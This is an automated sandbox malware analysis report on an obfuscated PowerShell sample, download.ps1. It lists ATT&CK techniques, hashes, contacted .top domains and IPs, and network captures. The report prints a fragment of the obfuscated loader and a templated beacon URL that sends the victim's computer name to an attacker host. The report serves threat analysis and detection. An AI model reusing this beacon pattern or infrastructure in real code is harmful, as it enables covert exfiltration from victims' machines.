Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 1 Virtualization/Sandbox Evasion | OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Obfuscated Files or Information | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 11 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| download.ps1 | 5% | ReversingLabs | Win32.Trojan.Generic | |

No Antivirus matches
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| www.google.com | 142.250.64.100 | true | false | | high |
| gajaechkfhfghal.top | 45.61.136.138 | true | false | | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92dMWpKKNr9WYzRGbiwpSeC0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM | false | | high |
| http://www.google.com/ | false | | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://gajaechkfhfghal.top | powershell.exe, 00000000.00000002.19683260823.0000012D303D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2F96C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30450000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://go.micro | powershell.exe, 00000000.00000002.19683260823.0000012D308E1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92dMWpKKNr9WYzRG | powershell.exe, 00000000.00000002.19683260823.0000012D3046F000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://csp.withgoogle.com/csp/gws/other-hp | powershell.exe, 00000000.00000002.19683260823.0000012D3045C000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://contoso.com/License | powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://contoso.com/Icon | powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://$ckda40xjnqlemz6/$jqly5pcaxf6vo3g.php? | powershell.exe, 00000000.00000002.19683260823.0000012D2FF8C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7 | powershell.exe, 00000000.00000002.19683260823.0000012D3045C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2FF7B000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.apache.org/licenses/LICENSE-2.0.htmlXz | powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.google.com/recaptcha/api.js | powershell.exe, 00000000.00000002.19683260823.0000012D3047C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30482000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2FF8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30450000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://contoso.com/ | powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.google.com | powershell.exe, 00000000.00000002.19683260823.0000012D3045C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2FF7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D3046F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30450000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.quovadis.bm0 | powershell.exe, 00000000.00000002.19710229213.0000012D47075000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://github.com/Pester/PesterXz | powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.19683260823.0000012D2F041000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://ocsp.quovadisoffshore.com0 | powershell.exe, 00000000.00000002.19710229213.0000012D47075000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://crl.micr | powershell.exe, 00000000.00000002.19711229210.0000012D471D0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.19683260823.0000012D2F041000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://$ckda40xjnqlemz6/$jqly5pcaxf6vo3g.php?id=$env:computername&key=$dhvyekza&s=527 | powershell.exe, 00000000.00000002.19683260823.0000012D305E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D303D4000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| http://pesterbdd.com/images/Pester.pngXz | powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
IP | Domain | Country | ASN | ASN Name | Malicious
45.61.136.138 | gajaechkfhfghal.top | United States | 40676 | AS40676US | false
142.250.64.100 | www.google.com | United States | 15169 | GOOGLEUS | false
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1579870
                                                                Start date and time:2024-12-23 13:21:10 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 5m 30s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name:Suspected VM Detection
Number of new started processes analysed:4
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:download.ps1
                                                                Detection:MAL
                                                                Classification:mal56.evad.winPS1@2/7@2/2
                                                                EGA Information:Failed
                                                                HCA Information:
                                                                • Successful, ratio: 100%
                                                                • Number of executed functions: 14
                                                                • Number of non-executed functions: 0
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .ps1
                                                                • Stop behavior analysis, all processes terminated
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                                                                • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                • Execution Graph export aborted for target powershell.exe, PID 2668 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • VT rate limit hit for: download.ps1
Time | Type | Description
07:23:18 | API Interceptor | 23x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
45.61.136.138 | download.ps1 | Get hash | malicious | Unknown | Browse | gajaechkfhfghal.top/kqubowg9xhhtr.php?id=computer&key=39968631184&s=527
45.61.136.138 | download.ps1 | Get hash | malicious | Unknown | Browse | gajaechkfhfghal.top/q9lpw6berahtr.php?id=user-PC&key=70313677457&s=527
45.61.136.138 | download.ps1 | Get hash | malicious | Unknown | Browse | cmacnnkfbhlcncm.top/mes6v8wj5phtr.php?id=computer&key=28342894733&s=527
45.61.136.138 | download.ps1 | Get hash | malicious | Unknown | Browse | cmacnnkfbhlcncm.top/tj9wps52g1htr.php?id=computer&key=19746202345&s=527
45.61.136.138 | download.ps1 | Get hash | malicious | Unknown | Browse | cmacnnkfbhlcncm.top/cbym9z28drhtr.php?id=user-PC&key=95448541662&s=527
45.61.136.138 | download.ps1 | Get hash | malicious | Unknown | Browse | cmacnnkfbhlcncm.top/jrmyitwlvqhtr.php?id=user-PC&key=69811902417&s=527
45.61.136.138 | download.ps1 | Get hash | malicious | Unknown | Browse | cmacnnkfbhlcncm.top/kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527
45.61.136.138 | download.ps1 | Get hash | malicious | Unknown | Browse | cmacnnkfbhlcncm.top/yudn6r4exvhtr.php?id=computer&key=71902578316&s=527
45.61.136.138 | download.ps1 | Get hash | malicious | Unknown | Browse | cmacnnkfbhlcncm.top/4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
gajaechkfhfghal.top | download.ps1 | Get hash | malicious | Unknown | Browse | 45.61.136.138
gajaechkfhfghal.top | download.ps1 | Get hash | malicious | Unknown | Browse | 45.61.136.138
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
AS40676US | download.ps1 | Get hash | malicious | Unknown | Browse | 45.61.136.138
AS40676US | download.ps1 | Get hash | malicious | Unknown | Browse | 45.61.136.138
AS40676US | loligang.mpsl.elf | Get hash | malicious | Mirai | Browse | 107.176.168.244
AS40676US | download.ps1 | Get hash | malicious | Unknown | Browse | 45.61.136.138
AS40676US | download.ps1 | Get hash | malicious | Unknown | Browse | 45.61.136.138
AS40676US | download.ps1 | Get hash | malicious | Unknown | Browse | 45.61.136.138
AS40676US | download.ps1 | Get hash | malicious | Unknown | Browse | 45.61.136.138
AS40676US | download.ps1 | Get hash | malicious | Unknown | Browse | 45.61.136.138
AS40676US | download.ps1 | Get hash | malicious | Unknown | Browse | 45.61.136.138
                                                                No context
                                                                No context
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):0.34726597513537405
                                                                Encrypted:false
                                                                SSDEEP:3:Nlll:Nll
                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:@...e...........................................................
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.7544337353339574
                                                                Encrypted:false
                                                                SSDEEP:96:OzhN/CdGc4kvhkvCCtSeuEnk5sHleuEnk9+sHu:Ot9TruEk1uEk9e
                                                                MD5:B5703952F0FCBE3C9D2A98081208EBD9
                                                                SHA1:5FF08CAF047292EFFB05F4527E597CCE369C2861
                                                                SHA-256:081B7182DCC9A856AE709BC90D177E5017FFBD15F9917214C45FBDECD3CC44E0
                                                                SHA-512:ABC7AF61E216E4FC4DB578FE0257D9BB7CD015A9C0ED6D34EED6C569D63D02B8E8DF19123676C42935A7BE89B5C807F59D21D4595EA68A47F3454A9E44B10D4E
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...;.}.S...O..q5U..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S......k5U.....q5U......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.Y.b....B......................A!.A.p.p.D.a.t.a...B.V.1......Y.b..Roaming.@......"S.Y.b....D.....................$...R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.Y.b....E.......................(.M.i.c.r.o.s.o.f.t.....V.1......Y.2..Windows.@......"S.Y.b....F.........................W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`.Y./....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`.Y./....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.Y].....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.Y.b....i...........
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.7544337353339574
                                                                Encrypted:false
                                                                SSDEEP:96:OzhN/CdGc4kvhkvCCtSeuEnk5sHleuEnk9+sHu:Ot9TruEk1uEk9e
                                                                MD5:B5703952F0FCBE3C9D2A98081208EBD9
                                                                SHA1:5FF08CAF047292EFFB05F4527E597CCE369C2861
                                                                SHA-256:081B7182DCC9A856AE709BC90D177E5017FFBD15F9917214C45FBDECD3CC44E0
                                                                SHA-512:ABC7AF61E216E4FC4DB578FE0257D9BB7CD015A9C0ED6D34EED6C569D63D02B8E8DF19123676C42935A7BE89B5C807F59D21D4595EA68A47F3454A9E44B10D4E
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...;.}.S...O..q5U..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S......k5U.....q5U......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.Y.b....B......................A!.A.p.p.D.a.t.a...B.V.1......Y.b..Roaming.@......"S.Y.b....D.....................$...R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.Y.b....E.......................(.M.i.c.r.o.s.o.f.t.....V.1......Y.2..Windows.@......"S.Y.b....F.........................W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`.Y./....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`.Y./....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.Y].....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.Y.b....i...........
                                                                File type:ASCII text, with very long lines (10697), with CRLF line terminators
                                                                Entropy (8bit):6.005992831097856
                                                                TrID:
                                                                  File name:download.ps1
                                                                  File size:18'916 bytes
                                                                  MD5:6dc27c0ae6c260bbed7a9b00e3306263
                                                                  SHA1:66d59a64b88b605d7fe887b4bcf7c9ea298fbb57
                                                                  SHA256:fca7d47c39e4e5b1e375ff7497d67cfbd2bb4d2fa937c617f5a6b5c3c71ccb21
                                                                  SHA512:11f4dcc0a45569b1e9a2a070945d9cb498d9eeb31550f405e0ac215b189ce2d5bb9d5d88cf2a6a1836418dcfd2e1e600a8e55a67ec2aaff555e2112310a8649f
                                                                  SSDEEP:384:4pLgpYa4i8Kg9AIL/ncToT6wAs1Ix9w62G7P1jWZLdtjMd7G8j0:4MNRUAOcToT61sG9UG7P1jIxtj1T
                                                                  TLSH:C8827C60334CE4F5D18AC9A3AD56BC083B21785BC1D7A9D0B7BCC5C67B899859F8CC02
                                                                  File Content Preview:$nzdxguep=$executioncontext;$ininenoratreinisonalreen = -join (0..54 | ForEach-Object {[char]([int]"00000098000000970000010200000095000001010000009900000101000001000000010000000095000001010000009300000094000001000000009700000101000000990000010100000101000
                                                                  Icon Hash:3270d6baae77db44
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 13:23:20.824507952 CET | 49753 | 80 | 192.168.11.20 | 45.61.136.138
Dec 23, 2024 13:23:20.985574961 CET | 80 | 49753 | 45.61.136.138 | 192.168.11.20
Dec 23, 2024 13:23:20.985924006 CET | 49753 | 80 | 192.168.11.20 | 45.61.136.138
Dec 23, 2024 13:23:20.988513947 CET | 49753 | 80 | 192.168.11.20 | 45.61.136.138
Dec 23, 2024 13:23:21.149554014 CET | 80 | 49753 | 45.61.136.138 | 192.168.11.20
Dec 23, 2024 13:23:21.177980900 CET | 80 | 49753 | 45.61.136.138 | 192.168.11.20
Dec 23, 2024 13:23:21.230735064 CET | 49753 | 80 | 192.168.11.20 | 45.61.136.138
Dec 23, 2024 13:23:21.276278973 CET | 49754 | 80 | 192.168.11.20 | 142.250.64.100
Dec 23, 2024 13:23:21.370769024 CET | 80 | 49754 | 142.250.64.100 | 192.168.11.20
Dec 23, 2024 13:23:21.371011019 CET | 49754 | 80 | 192.168.11.20 | 142.250.64.100
Dec 23, 2024 13:23:21.371114969 CET | 49754 | 80 | 192.168.11.20 | 142.250.64.100
Dec 23, 2024 13:23:21.465811968 CET | 80 | 49754 | 142.250.64.100 | 192.168.11.20
Dec 23, 2024 13:23:21.850532055 CET | 80 | 49754 | 142.250.64.100 | 192.168.11.20
Dec 23, 2024 13:23:21.850773096 CET | 80 | 49754 | 142.250.64.100 | 192.168.11.20
Dec 23, 2024 13:23:21.851108074 CET | 49754 | 80 | 192.168.11.20 | 142.250.64.100
Dec 23, 2024 13:23:21.852533102 CET | 49754 | 80 | 192.168.11.20 | 142.250.64.100
Dec 23, 2024 13:23:21.946647882 CET | 80 | 49754 | 142.250.64.100 | 192.168.11.20
Dec 23, 2024 13:23:21.954282045 CET | 80 | 49754 | 142.250.64.100 | 192.168.11.20
Dec 23, 2024 13:23:21.954557896 CET | 80 | 49754 | 142.250.64.100 | 192.168.11.20
Dec 23, 2024 13:23:21.954567909 CET | 80 | 49754 | 142.250.64.100 | 192.168.11.20
Dec 23, 2024 13:23:21.954714060 CET | 49754 | 80 | 192.168.11.20 | 142.250.64.100
Dec 23, 2024 13:23:22.056993961 CET | 49753 | 80 | 192.168.11.20 | 45.61.136.138
Dec 23, 2024 13:23:22.057593107 CET | 49754 | 80 | 192.168.11.20 | 142.250.64.100
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 13:23:20.710971117 CET | 64615 | 53 | 192.168.11.20 | 1.1.1.1
Dec 23, 2024 13:23:20.817496061 CET | 53 | 64615 | 1.1.1.1 | 192.168.11.20
Dec 23, 2024 13:23:21.179488897 CET | 59704 | 53 | 192.168.11.20 | 1.1.1.1
Dec 23, 2024 13:23:21.275252104 CET | 53 | 59704 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 13:23:20.710971117 CET | 192.168.11.20 | 1.1.1.1 | 0x9107 | Standard query (0) | gajaechkfhfghal.top | A (IP address) | IN (0x0001) | false
Dec 23, 2024 13:23:21.179488897 CET | 192.168.11.20 | 1.1.1.1 | 0x3905 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 13:23:20.817496061 CET | 1.1.1.1 | 192.168.11.20 | 0x9107 | No error (0) | gajaechkfhfghal.top | | 45.61.136.138 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 13:23:21.275252104 CET | 1.1.1.1 | 192.168.11.20 | 0x3905 | No error (0) | www.google.com | | 142.250.64.100 | A (IP address) | IN (0x0001) | false
                                                                  • gajaechkfhfghal.top
                                                                  • www.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49753 | 45.61.136.138 | 80 | 2668 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 13:23:20.988513947 CET | 215 | OUT | GET /hxe035pvfthtr.php?id=computer&key=72113948934&s=527 HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                  Host: gajaechkfhfghal.top
                                                                  Connection: Keep-Alive
Dec 23, 2024 13:23:21.177980900 CET | 166 | IN | HTTP/1.1 302 Found
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Mon, 23 Dec 2024 12:23:21 GMT
                                                                  Content-Length: 0
                                                                  Connection: keep-alive
                                                                  Location: http://www.google.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49754 | 142.250.64.100 | 80 | 2668 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 13:23:21.371114969 CET | 159 | OUT | GET / HTTP/1.1
